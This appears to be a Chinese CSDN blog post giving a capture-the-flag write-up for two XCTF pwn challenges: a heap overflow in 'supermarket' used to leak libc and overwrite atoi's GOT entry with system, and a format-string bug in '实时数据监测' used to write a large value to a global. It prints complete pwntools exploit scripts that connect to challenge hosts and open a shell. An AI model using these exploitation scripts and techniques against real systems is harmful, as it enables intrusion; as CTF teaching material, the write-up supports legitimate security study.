攻防世界pwn supermarket + 实时数据监测

最新推荐文章于 2022-06-22 16:25:32 发布
最新推荐文章于 2022-06-22 16:25:32 发布
阅读量906 收藏 1
点赞数 2
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/104292025
版权

supermarket

这是一个典型的堆题,菜单类型。

在这里插入图片描述

只开了NX保护的32位程序。
我们来分析一下程序
在这里插入图片描述

程序实现了增删改查,其中改可以改价格和商品的描述,我们重点看改描述,因为程序的漏洞就在这里。
在这里插入图片描述

首先让我们输入商品的名字,通过名字来找到商品,这里我们就可以伪造商品了。继续往下看会看到程序让我们输入描述信息的size。通过程序分析我们知道(&s2)[v1]+5是结构体中存储堆的size,(&s2)[v1]+6是结构体存储信息堆的的地方。
然而程序在输入size后,分配一个新的堆空间,但是仍然是通过结构体中的size来输入堆信息,这里就很容易会造成堆溢出。

首先,写好菜单题的模板:

#! /usr/bin/env python
from pwn import *
context.update(arch='i386', log_level='debug')

p = remote('111.198.29.45', 44261)
#p = process('./supermarket')
e = ELF('./supermarket')
#l = e.libc
l = ELF('./libc.so.6')

def add(name, price, size, desc):
    p.sendlineafter('>>', '1')
    p.sendlineafter('name:', str(name))
    p.sendlineafter('price:', str(price))
    p.sendlineafter('size:', str(size))
    p.sendlineafter('description:', str(desc))

def delete(name):
    p.sendlineafter('>>', '2')
    p.sendlineafter('name:', str(name))

def show():
    p.sendlineafter('>>', '3')
    p.recvuntil('B:')
    p.recvuntil('des.')
    return p.recvuntil('\n', drop=True)

def change_desc(name, size, desc):
    p.sendlineafter('>>', '5')
    p.sendlineafter('name:', str(name))
    p.sendlineafter('size:', str(size))
    p.sendlineafter('description:', str(desc))

写好后我们通过程序输入来测试:

add('A','1','256','a')
change_desc('A','8','a')
add('B','1','16','b')
gdb.attach(p)
pause()

我们通过gdb.attach§来使用gdb查看堆内存的状态

在这里插入图片描述

弹出框后我们使用vmmap的命令,查看堆地址。

在这里插入图片描述
在这里插入图片描述

这里我们可以看出ralloc身下的信息堆我们可以用来伪造第二个商品的结构体,造成UAF。

add('A','1','256','a')
change_desc('A','8','a')
add('B','1','16','b')
#gdb.attach(p)
#pause()
payload = flat(['a' * 0xc, 0x21, 0x42, 'a'*0xc, 0x1, 0x10, e.got['atoi']])
change_desc('A', '256', payload )
gdb.attach(p)
pause()

我们用刚刚的思路写一个payload来测试一下。

在这里插入图片描述

为造好后我们调用第二个商品的堆的信息时就会输出我们想要输出的信息了。

完整exp:

#! /usr/bin/env python
from pwn import *
context.update(arch='i386', log_level='debug')

#p = remote('111.198.29.45', 44261)
p = process('./supermarket')
e = ELF('./supermarket')
#l = e.libc
l = ELF('./libc.so.6')

def add(name, price, size, desc):
    p.sendlineafter('>>', '1')
    p.sendlineafter('name:', str(name))
    p.sendlineafter('price:', str(price))
    p.sendlineafter('size:', str(size))
    p.sendlineafter('description:', str(desc))

def delete(name):
    p.sendlineafter('>>', '2')
    p.sendlineafter('name:', str(name))

def show():
    p.sendlineafter('>>', '3')
    p.recvuntil('B:')
    p.recvuntil('des.')
    return p.recvuntil('\n', drop=True)

def change_desc(name, size, desc):
    p.sendlineafter('>>', '5')
    p.sendlineafter('name:', str(name))
    p.sendlineafter('size:', str(size))
    p.sendlineafter('description:', str(desc))

add('A','1','256','a')
change_desc('A','8','a')
add('B','1','16','b')
#gdb.attach(p)
#pause()
payload = flat(['a' * 0xc, 0x21, 0x42, 'a'*0xc, 0x1, 0x10, e.got['atoi']])
change_desc('A', '256', payload )
#gdb.attach(p)
#pause()
l.address = u32(show()[:4]) - l.symbols['atoi']
print hex(l.address)
change_desc('B', '16', p32(l.symbols['system']))
p.sendlineafter('>>', '/bin/sh\x00')
p.interactive()

实时数据监测

格式化字符串漏洞(大数据写)

在这里插入图片描述

好家伙,保护全关的32位程序。
丢进ida中分析一下。
在这里插入图片描述

看起来像新手区的题目,格式化字符串漏洞,但是这里要写一个比较大的数据到key中,拿出模板:

def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr


def fmt_str(offset, size, addr, target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload

有了这个模板,不管是64位还是32位的大数据格式字符串漏洞的填写都不是问题(普遍情况下,不代表全部)。
这里我们要知道offset,我们用gdb测试一下就知道了。

在这里插入图片描述

直接测试出来偏移为12,我们填进去就可以了。

完整exp:

#! /usr/bin/env python
from pwn import *
p = remote('111.198.29.45',36468)
elf = ELF('./datacheck')

def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr


def fmt_str(offset, size, addr, target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload
payload = fmt_str(12,4,0x0804A048,0x02223322)

p.send(payload)
p.interactive()
PLpa、
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN系列】攻防世界 supermarket 题解
Vicl1fe的博客
10-30 450
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/seaaseesa/article/details/103093182 https://blog.csdn.net/qq_44370676/article/details/108229050(较详细) 分析 大概看了一个,是一个商品系统。一个商品含有名字、价格、描述,并且程序有五个功能 : 1、添加商品 2、删除商品 3、展示商品 4、修改商品价格 5、修改商品的
pwn入门题目+exp
最新发布
01-26
初级的ROP,附有完整exp,可以学一下
攻防世界 Pwn 实时数据监测
MrTreebook的博客
12-12 578
攻防世界 Pwn 实时数据监测1.题目下载地址2.checksec3.IDA4.格式化字符串漏洞的解法5.exp 1.题目下载地址 点击下载 2.checksec 什么保护都没开,估计是很简单的题 进IDA分析一下 3.IDA int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); if ( key == 35795
攻防世界PWN刷题-实时数据监测
m0_53932372的博客
12-30 1461
实时数据监测 思路:程序是裸奔的。 漏洞是格式字符串,利用这个漏洞修改key的值,就可以了。 学会的新知识:本来想大数字覆盖一个一个来,但其实pwntools的fmtstr_payload模块就可以了。 fmtstr_payload(offset,{address:value}) exp: #!/usr/bin/python from pwn import * fmt_addr=0x0804A048 p = remote("111.200.241.244",49656) payload=fmtstr_pa
攻防世界高手进阶区 ——实时数据检测
weixin_62675330的博客
02-13 1189
攻防世界高手进阶区 ——实时数据检测 1.分析文件 先checksec一下 发现啥都没有开,完全就是裸奔。 运行一下[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 运行发现就是想要把key的值改为0x2223322。 直接上ida int locker() { char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s);
攻防世界-pwn-实时数据监测
xxxsdd的博客
02-22 1095
1.ida查看代码 2.查看保护机制 什么都没有开 3.知识点 格式化字符串漏洞 例子 printf("aa%16$n") 32位程序时 会向栈地址为esp+15中的地址addr所指向的内存单元写入2 因为aa表示了两个字节所以向[addr]中 写入2 若想写入15 则可以利用 printf("a*15%16$n") or printf("15x%16$n") 来向栈地址为esp+15中的地...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
[攻防世界]实时数据监测
逆向萌新的博客
06-22 253
[攻防世界]实时数据监测
[攻防世界 pwn]——实时数据监测
Y_peak的博客
02-27 604
[攻防世界 pwn]——实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746,就好 写个小脚本在pwndbg中看看偏移 from pwn import * p = process('./pwn') gdb.attach(p, 'b *0x080484A7') #p = remote("111.200.241.244",48715) key_addr = 0x0804A048 p
攻防世界 pwn--实时数据检测
YANG12345_6的博客
11-30 271
32位程序 保护都没有开 直接拖进ida分析 int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); // 含printf函数,有格式化字符串漏洞 if ( key == 0x2223322 ) // key在bs
攻防世界xctf-实时数据监测 wp
Casuall的博客
08-14 1274
本题是一个简单的格式化字符串漏洞的利用。先查看一些文件的信息,32位的程序,保护措施没有开。 用IDA查看一些伪代码,发现main函数里面只有一个locker函数,locker函数首先接受了一个字符串s,然后调用imagemagic函数,这个函数跟进去查看其实就是一个printf函数,最后比较key的值是不是为0x2223322,如果相等,返回shell,否则打印key的地址和值。 我们在本地运行一下看看,由于直接把key的地址告诉你了,所以本题的思路是找到格式化字符串地址的偏移,然后覆盖key的值。格
攻防世界PWNSupermarket题解
seaaseesa的博客
11-15 2240
Supermarket 首先,看一下程序的保护机制。看起来还不错 然后,我们用IDA分析一下 分析出程序大概有这样的一个结构体 typedefstructNode{ charname[16]; intprice; intdescription_size; char*description; }Node;...
攻防世界supermarket
qq_44370676的博客
08-25 357
首先检查保护机制 然后运行一下 是一个菜单题,接着往下看 可以看到,选项3会按行打印出每个商品的信息,在des.后面就是商品的description 接着IDA分析 首先看看sub_8048864() sub_8048812就是读入一串字符串到nptr,这一块并没有溢出点,但是这里并不是以%d的方式输入数字,而是先输入字符串然后用atoi函数转换,如果能够修改atoi的got表为system并且输入/bin/sh那么我们的目的便达成了。接着往下看,看能不能实现这.
攻防世界-进阶区-实时数据监测
CHAWUCIREN1的博客
12-01 2923
将35795746换成十六进制0x2223322(按H) 根据函数,只需要令key等于0x2223322即可getshell 查看一下 imagemagic()函数 存在格式化字符串漏洞 具体看wiki:https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/ 了解到一个骚操作 fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') 第一个参数表示格式化字符串...
[XCTF-pwn] 4-实时数据监测
weixin_52640415的博客
03-03 176
格式化字符串漏洞,在指定位置写入指定值 from pwn import * p = remote('111.200.241.244', 59708) context(arch='i386', log_level='debug') p.sendline(fmtstr_payload(12, {0x0804A048 : 35795746})) p.interactive()
uaf-逻辑题-攻防世界 supermarket
csdn546229768的博客
11-30 372
刚开始我也被这题绕晕了,做这种题要画图画图!!!不然很容易做着做着忘了自己做到哪里来了 本题环境是ubuntu16、glib2.23!!!我第一次做的时候用的ubuntu18也就是glib2.27这时有tcache freechunk的分配策略不一样死活跑不出来,这题我还要研究一下tcache版本的。 首先申请了一个不在fastbin范围(0x10~0x58)的chunk0,然后再申请一个随便大小的chunk1,解释:因为下面我将要用remalloc重新分配chun0,remalloc如果重新分配的ch
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值